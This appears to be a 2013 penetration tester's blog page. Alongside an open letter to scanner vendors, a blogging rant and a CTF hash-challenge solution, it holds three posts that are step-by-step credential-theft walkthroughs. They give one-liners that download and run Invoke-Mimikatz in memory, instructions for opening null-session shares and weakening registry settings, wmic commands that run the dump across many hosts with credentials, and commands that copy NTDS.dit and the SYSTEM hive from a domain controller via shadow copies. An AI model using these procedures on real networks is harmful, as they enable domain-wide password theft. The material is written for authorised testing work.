Projects Publications Brandon

Tuesday, October 15, 2013

Open Letter to Vulnerability Scanner Companies

By With No comments:
Dear @NeXpose, @Qualys, @Nessus and the rest of you…

As listed here: Vulnerability Scanning Tools

(I hope some of you are already doing this and I just haven’t seen your tools yet)

As Penetration Testers / Red Teamers our deliverables are, at worst, a long winded list of vulnerabilities or print out from one of your tools, at best, they are a narrative that will assist anyone reading it on understanding the impact of what was found and how.

These vulnerabilities can range from “YOU ALLOW OPENSSL 1.0!! OMG” to “There is an implementation-specific 0day vulnerability in your Widgets Inc. application”. It takes us a very long time to write these things up and they are usually in a PDF or Word Doc format. Neither of which are easy to parse, automate or in all honesty do anything with at all. Some of the better Pentest groups / companies have web apps where customers can login to see their vulnerabilities or Excel documents with findings. This is a painful process.

How you can help and why you care:

All of you have gone to being web accessible, if you were to create an interface for “Pentesters” or “Security Auditors” or “Red Teamers” (call it what you will), an account level that would allow us to login and directly input our “findings” into a company’s ALREADY CONFIGURED vulnerability management solution (YOU), you would make our lives easier, as well as your customers.

The things that would be needed in this interface:
  • Custom vulnerability creation with ability to fill out fields with respect to references, suggested remediation, suspected impact level, screen shots, and attack detection capabilities (the list goes on)
  • No access to other scanner results, we’re pentesters if we can cheat we will ;-) (but make it optional to turn on)
  • Last (year|month|century)’s “pentest” findings. These can be used as “ya we already know about those and are fixing them” or “please make sure they were all fixed”
  • During input use AJAX or whatever funky tech you use to auto-suggest vulnerability IDs or things that you already have in the database. It would save our typing and make it much easier to track for your customers.
  • Make it have a timed access period with an auto-password change. Since a company would be giving a tester access to the system they scan from. The “cheat” factor could be curtailed here.
  • If you are a non-hosted product, make the interface something I don’t have to punch holes in my firewall to make happen (unless I want to).
  • Ability to input other vendor vulnerability scanning or pentesting (Impact/MSF Pro/CANVAS) exports.
Benefits to pentesters:
  • The report out would be more of a highlights reel + executive summary versus a list of vulnerabilities
  • Inputing findings during the test with a screenshot upload and specific fields is much easier than trying to keep track of findings then writing long reports that 80% of your time is spent of word processor formatting problems
  • If a finding is a known quantity, using the information already apart of the vulnerability scanner, instead of having to have a collection of 300+ template findings or having to write new ones
Benefits to the customer:
  • The ability to easily come back 2,3,6 months later and re-check any findings/vulnerabilities by clicking a button if the finding was related to a vulnerability ID
  • No need to convert / translate pentester speak into a finding.
  • Easy tracking from reporting to fix
  • Easy scaling. Pentester reports Default Creds on Tomcat server with vuln ID 999, scanner automagically says this vuln is also on these other 40 servers.
I’m sure there are a bunch of other things that can make an interface like this WIN-WIN-WIN that I can’t think of right now.

Making money on the idea:
  1. Companies could then start requesting “NeXpose Certified Pentesters” or “Nessus Certified” pentest company. Which would involve your company training those testers to use your interface.
  2. You could sell deploy-able “appliances” so that the testers can interface with the internal asset without having access inside the firewall. (Basically internal scanner pulls down data of “findings” from Internet accessible “appliance” that gets destroyed (un-deployed) at the end of the test.
All of this would result in a more unified way for testers to report findings, make it easier for the people who consume those findings to act on them (make tickets, deploy and track the remediation efforts). As well as make you a few dollars along the way.

Thanks for you time,
mubix

Update: Just to clarify a few things discussed on twitter already:
  1. The certification isn’t that a tester is an uber-hacker, it’s basically for a company to say “You know how to user our findings/vuln management tool without breaking it”. Think of it less like a CISSP/OSCP and more like a check box and a small give on the “integrity of uber pentesters” to get a greater good done.
  2. This suggestion isn’t a different way to export scanner findings. Its a way for testers to input their findings in an easy to manage format that the company’s employees already know how to deal with.
  3. This is meant to be a small addition to the existing infrastructure of an organization, not something another piece of software that both the company employees and testers have to learn as well and support on their infrastructure. Minimal impact to current functionality and use is key.
Read More

Tuesday, October 08, 2013

Outlook Cached Attachments

By With No comments:
I happened upon an interesting directory today that I didn’t know about:

%USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\

In that directory was what looked to be a randomly generated 8 character directory (i.e A821ZSQI) inside of which held a bunch of attachments from my email (not just my inbox).

According to Microsoft KB 817878 this is a “Secure” temp folder which can be identified by a handy dandy registry key (Outlook 2010 referenced, KB has others):

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Security

I tested this out with a email that was encrypted. Once the file was opened it landed in the temp directory and stayed there after I closed the email and Outlook.

This is definitely going on the top of my Post-Exploitation click scripts.


Read More

Sunday, October 06, 2013

Dumping a Domain Worth of Passwords With Mimikatz

By With No comments:
clymb3r recently posted a script called “Invoke-Mimikatz.ps1” basically what this does is reflectively injects mimikatz into memory, calls for all the logonPasswords and exits. It even checks the targets architecture (x86/x64) first and injects the correct DLL.

You can very easily use this script directly from an admin command prompt as so:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

(This works REALLY well for Citrix and Kiosk scenarios and it’s too hard to type/remember) This runs the powershell script by directly pulling it from Github and executing it “in memory” on your system.

One of the awesome added capabilities for this script is to run on a list of hosts. as so:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"

This works great as all the output is directly on your system and all executed through Powershell Remoting. Powershell Remoting is pretty much the same as WinRM. This service however is not enabled by default and can be pretty hit or miss on how much any given enterprise uses WinRM. However, it is usually the servers and more important systems that have it enabled more often than not.

You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default comm ports for WinRM 5985 (HTTP) and 5986 (HTTPS).

If you find that your target isn’t a WinRM rich environment or you just want more passwords you can take a slightly more painful route, I call it “Mass Mimikatz”

Step 1. 

Make a share, we are doing this so we can not only collect the output of all our computers passwords, but to host the CMD batch file that will run the powershell script:

cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t

We are setting “Everyone” permissions on a Share (net share) and NTFS (icacls) level for this to work properly.

Step 2.

Set registry keys. There are two registry keys that we need to set. The first allows Null Sessions to our new share and the second allows null users to have the “Everyone” token so that we don’t have to get crazy with our permissions. I have create a meterpreter script that has a bunch of error checking here: massmimi_reg.rb or you can just make the following changes”

HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ  = open
HKLM\System\CurrentControlSet\Contol\Lsa "EveryoneIncludesAnonymous" = 1

Step 3.

Change directory into new “open” directory. This is so our uploads and in particular our web server will be hosted out of the correct directory.

Step 4.

Upload powershell script powermeup.cmd – this script will run our hosted Invoke-Mimikatz script on each host:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1

Step 5.

Upload clymb3r’s Invoke-Mimikatz ps1 – Download from PowerSploit repo: source on github

Step 6.

Upload mongoose: Downloads Page – Both regular and tiny versions work. This is an awesome, single executable webserver that supports LUA, Sqlite, and WebDAV out of the box. Tiny version is under 100k.

Step 7.

Upload serverlist.txt – This is a line by line list of computer names to use mimikatz on. You’ll have to gather this one way or another.

Step 8.

Execute mongoose (from directory with mimikatz.ps1) – This will start a listener with directory listings enabled on port 8080 by default

Step 9a.

Execute wmic:

wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"

Step 9b.

Execute wmic with creds:

wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"

Step 10.

Watch as text files full of wonder and joy fill your share.

You can find the scripts here: https://github.com/mubix/post-exploitation/tree/master/scripts/mass_mimikatz

Don’t forget to clean up::

  1. kill mongoose process
  2. net share open /delete
  3. kill/reset registry values
  4. delete “open” directory

Got a better way of getting this done? Please leave a comment.

P.S. You could just enable Powershell Remoting for them ;)

psexec @serverlist.txt -u [admin account name] -p [admin account password] -h -d powershell.exe "enable-psremoting -force"

"Passwords, here, here, here, EVERYWHERE!"

Read More

Saturday, October 05, 2013

Vanilla Cake #DerbyCake 2013 Solution

By With No comments:
One of the most contested parts of the #DerbyCake contest was the hint on the Vanilla cake. It was just a long string of 1s and 0s. The hint that I kept telling everyone is that the “binary is binary” and I meant it. You weren’t supposed to hash or do anything special with it.

The reason this particular challenge is in the contest is that I run into this scenario a lot. Many times when I access binary password fields in either the Windows registry or in database servers the data comes out in 1s and 0s or some other binary format and I have to convert it back into its original hash format.

The solution there-for is pretty straight forward. You start with your very long binary string: (I’m using ruby, but its pretty much the same in Python or another language)

cakestring = '01111101011110101110111111100110101110010001000111010101010110010000100110100010011011110110010001111110101010101010111110100111000111101101001011010010001100011110101100100110101011011011001110100001010110100100101000100010100111110011100001000110100101101100101010110011011000100010001110111100011011100001011011100001111111000110101111110111101111011101110001000100010010001001001010001100101010100000000111000000100110001100011011100010010101001110000011100001100000010111111100100000011101100100011001110101'

Then you “pack” the binary into a string format:

reverse1 = [cakestring].pack("b*")

And finally into the hex format of the SHA512 hash (most people got that it was a 512 hash due to the 512 bits:

puts "Hash: #{reverse1.unpack("H*")}"

That easy. Resulting in a easily cracked SHA512 hash (that is, if you got all the hints in the DerbyCon presenters slides)

Hash: be5ef7679d88ab9a9045f6267e55f5e5784b4b8cd764b5cd855a5244f91c626953cd46c43d7668873fd6efbd3b221249315580031963472a078781fe046e62ae
Password: correct horse battery staple

Here is how you would generate such a challenge if you were so inclined:

#!/usr/bin/env ruby
require 'digest/sha2'

password = "correct horse battery staple"
puts "Password: #{password}"
forwards1 = Digest::SHA512.hexdigest(password)
puts "Hash: #{forwards1}"

forwards2 = forwards1.scan(/../)
forwards3 = []
forwards2.each do |f2|
    forwards3 << f2.hex.chr
end
forwards4 = forwards3.join

puts "Binary: #{forwards4.unpack("b*")}"

You can find a write up of the rest of the challenges and hints over on Ryan Fenno’s blog here: http://slae412.wordpress.com/2013/10/04/derbycake-2013-write-up/

Sorry to everyone who beat their head upside the wall for hours on this one. I was actually expecting this to be the first challenge to fall.
Read More

Friday, October 04, 2013

Mass Mimikatz

By With No comments:
1. Make Share:

cd\

mkdir open

net share open=C:\open /grant:everyone,full

icacls C:\open\ /grant Everyone:(OI)(CI)F /t

2. Set registry keys (massmimi_reg.rb meterpreter script):

reg change HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ open

reg change HKLM\System\CurrentControlSet\Contol\Lsa "EveryoneIncludesAnonymous" 1

3. Change directory into new “open” directory

4. Upload powershell script (powermeup.cmd):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1

5. Upload clymb3r’s Invoke-Mimikatz.ps1 - Download from PowerSploit repo: source on github

6. Upload mongoose: Downloads Page (Updated to use Archive.org version) - Both regular and tiny versions work

7. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on.

8. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default

9. Execute wmic:

wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"

9a. Execute wmic with creds:

wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"

clean up:
1. kill mongoose process
2. net share open /delete
3. kill registry values
4. delete “open” directory
Read More

Tuesday, September 17, 2013

Blogging Requirements

By With No comments:
So I’ve been trying out blogging software and platforms up and down the Internet streets, and I really haven’t found one that works really well (IMHO).

Until @daanraman suggested Roon.io which I hadn’t heard of yet. I have to admit, it has probably one of the best designed interfaces I’ve seen. I don’t need micromanage control over a blog. I have pretty basic needs actually.
  1. I have to be able to blog from where I want to blog. Oddly enough this is where most newer blogging platforms fall down. Your amazing Javascript editor that took your 500 hours to get right is just something I’m not going to use all that often. Its pretty rare for me to want to blog inside of a browser actually. I usually have 100 tabs open and your stupid editor is often lost in the mix. It’s just nice to have something separate that I can pull things I have in those 100 browser tabs into without having to find the editor tab again. (yes, I realize I can pull out another windows but then the editors usually don’t fit)
  2. I post code snippets, directory listings and a ton of other things that I don’t want officially rendered. This is probably not a common problem among bloggers but I can’t count how many times and platforms can’t get a simple windows directory listing to display correctly without me trying to figure out what code finagling I have to do to get the blogging platform to display it the way I need it to. I will use whatever syntax is needed, I just can’t be expected to remember every undocumented workaround to get a HTML tag to display without rendering.
  3. This a bit of #1 but I need to be able to blog with ease. If it takes me 40 minutes to just get formatting correct or fixing blogging software to blogging platform incompatibility issues, I’m just going to stop trying. Or if it takes me 10 minutes of git update, git push etc to add a new post, it just isn’t worth it. (I realize you can script Octopress up, but then you’ll have it scripted up in one location/computer, which goes against #1
  4. I really don’t care how many templates or formats you have, as long as one is actually readable. I know most customers/bloggers want their Ads, and support, and logos and stuff everywhere. I’m not them. If the reader has an easy time reading my content, I’m happy.
  5. I will pay for these conveniences. I’ve been paying SquareSpace for close to 4 years now about $20 per month. I actually don’t want my blogging service to be free. The reason for this is because free == I’m the product. I don’t want Ads to one day creep into my site because the developer of the blogging platform needs money to live on. I would rather pay them directly. The other thing that “free” breeds, is direction inflicted by the one paying the bills. I use the word “inflicted” quite specifically since I have seen some blogging platforms go down the tubes because their VC had some “brilliant” ideas. I’d pay fair pay for fair service.
  6. A developer/team/support who listen. I don’t care if they say “sorry, not something we are looking on doing”, thats fair, its their software, not mine, and I’m a big boy I can move on if its something I care about. But honestly, I have no idea why most applications don’t have a ‘vote for a feature’ option/service, or at the very least “feature request” buttons.
  7. Hosted. I’m very much done trying to protect and secure a platform or OS that my blog is hosted on. I’d rather spend my time on other things, like you know, generating content.
Anywho, thats my rant on what I’d love to see in a blogging platform, promised someone I would write it up, so here it is.
Read More

Thursday, June 20, 2013

Volume Shadow Copy NTDS.dit Domain Hashes Remotely - Part 1

By With No comments:

This and part 2 are mostly just an update to http://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/ but without the need for VSSOwn, that and we are doing it remotely without the need for shell on the DC.
Ever run into a Domain Controller that wasn’t allowed to talk to the Internet, had insane AV and GPOs not allowing anyone to RDP in (Even Domain Admins) unless they provided some kind of voodo happy dance? Ya me neither, but here is how you can still dump domain hashes and hash history if you run into that case. Lets start

First authenticate to the domain controller and make sure you have a good working directory to use.

net use \\DC1 /user:DOMAIN\domainadminsvc domainadminsvc123
dir \\DC1\C$

Alright, lets say “TEMP” is there and it’s empty on the remote DC. The way we are going to run commands will not allow us to get results directly so we are going to use a temp file on the DC in C:\TEMP where we already made sure is clear.

We are going to be using Volume Shadow Copies to pull the NTDS.dit file (Active Directory’s DB much like Window’s SAM file except that it stores the entire AD set of objects there), we also need the SYSTEM registry hive. You can get the SAM registry hive as well but that will only get local DC credentials.

So lets list the current volume shadow copies to see if we need to create one, from a Windows command prompt (or if you’ve installed wmic for Linux via http://www.krenger.ch/blog/wmi-commands-from-linux/ ) – this IS an interactive command so this won’t work very nicely in a Meterpreter shell:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > C:\tempoutput.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 7304;
        ReturnValue = 0;
};

To break down this command:


  • wmic /node:DC1 – tells it to interact with the WMI API on DC1
  • /user:DOMAIN\domainadminsvc /password:domainadminsvc123 – authentication
  • process call create – WMI speak for create a process
  • cmd /c – vssadmin doesn’t operate outside of cmd for some reason…
  • vssadmin list shadows – List any shadow volumes that already exist
  • 2>&1 > C:\temp\output.txt – Take STDIN and STDERROR and throw it in a text file on DC1 C:\TEMP. Make sure you specify full path because you will be executing from within C:\Windows\System32 and its a pain to find anything in that directory. So if you just specify > bob.txt you get to hunt in C:\Windows\System32 or wherever WMI wants to execute you from for bob.txt

Process starts and then you need to view the output file by either copying it down, type \DC1\C$\TEMP\output.txt or mount the C drive as a network share. Either way you should either see something like this:

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Contents of shadow copy set ID: {671090fd-0198}
   Contained 1 shadow copies at creation time: 5/31/2013 11:29:03 AM
      Shadow Copy ID: {0863e309}
         Original Volume: (C:)\\?\Volume{c44da10e-0154-11e1-b968-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: wpad
         Service Machine: wpad
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

or

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

No items found that satisfy the query
If there are no shadow copies or the ones there are too old (look at the creation time), you can create a shadow copy using the ‘vssadmin create shadow /for=C: command. (This command only applies to Server OS (Win2k3/Win2k8) but since those are the only two that commonly have NTDS.dit files we don’t have to remember this):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"

The other thing to keep in mind is that NTDS.dit isn’t always on the main drive. It is commonly on a “D” drive for safety if a HDD goes bad or something. But it should always be in a folder called NTDS. (By default this is C:WindowsNTDS)

Next we just copy the files out of the shadow copies. First the SYSTEM hive:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1 > C:\temp\output.txt"

Then the NTDS.dit (notice this one isn’t in System32):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt"

In Kali Linux you could use the WMIS package to do much the same thing:

root@kali:~# wmis -U DOMAIN\domainadminsvc%domainadminsvc123 //DC1 cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt
NTSTATUS: NT_STATUS_OK - Success

Copy those files to your own system for offline extraction which I’ll cover in part 2.
Read More
Home About-us Privacy Policy Contact-us Services
Design By Templateclue